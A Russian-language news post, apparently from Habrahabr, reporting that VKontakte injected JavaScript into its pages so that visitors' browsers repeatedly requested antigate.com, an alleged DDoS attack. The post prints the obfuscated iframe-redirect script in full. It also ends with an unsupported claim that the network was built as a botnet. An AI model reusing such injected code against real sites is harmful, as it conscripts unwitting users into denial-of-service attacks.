Социальная сеть «ВКонтакте» внедрила на все страницы сайта сценарий, осуществляющий DDoS атаку на сайт antigate.com.
Сегодня многие пользователи ВБотнете, посетившие сайт социальной сети, могли стать невольными участниками DDoS атаки на сайт antigate.com.
PS: Antigate - сервис для автоматического распознавания капчи, ей в частности пользуются многие ботоводы и другие люди занимающейся спамом к примеру...
На страницах пользователей загружался следующий javascript сценарий:
function _test() {
var fr=utilsNode.appendChild(ce('iframe')),d=fr.contentWindow.document;d.open();
d.write(' <script>this.location="http://ant'+'iga'+'te.com/i '+'n.php?'+'firs'+'t_an'+'d_la'+'st_wa'+'rnin'+ 'g=o'+'n";</sc'+'ript>');
setTimeout(re.pbind(fr),1000);
}
<body onresize="onBodyResize()" class="is_rtl font_default" onload="_test()">
Этот сценарий отправлял запрос на сайт antigate.com из браузера каждого пользователя соцсети «ВКонтакте» при каждой загрузке страницы.
Скрипт создаёт iframe и подгружает страницу http://****.com/in.php?first_and_last_warning=on (что-бы избежать Хабраэффекта, ссылка убрана).
Из адреса видно: "первое и последнее предупреждение".
Такие действия уже наблюдались со стороны ВКонтакте во время Премии Рунета: ВКонтакте против «Премии рунета»
UPD1: ВКонтакте убрал iframe, после того как Антигейт сделал редирект на xvideos
UPD2: ВКонтакте поставили xmlhttprequest, но через некоторое время убрали.
Подобные действия со стороны администрации «ВКонтакте» не могут радовать, и невольно поднимается вопрос о моральности и законности (ст. 274 УК РФ) подобных действий.
Пресс-служба «ВКонтаке» пока никак не прокомментировала это событие.
http://www.securitylab.ru/news/423743.php
pps: ну вот и началось, теперь все понятно, вконтакте изначально создавался как ботнэт из обычных пользователей и теперь они будут ддосом заниматься.
http://habrahabr.ru/post/142836/
Внимание! Данная статья была написана более полугода назад, актуальность материала и состояние жизни ссылок не гарантируется! Воспользуйтесь дополнительными параметрами для поиска необходимого вам контента! Приносим свои извинения...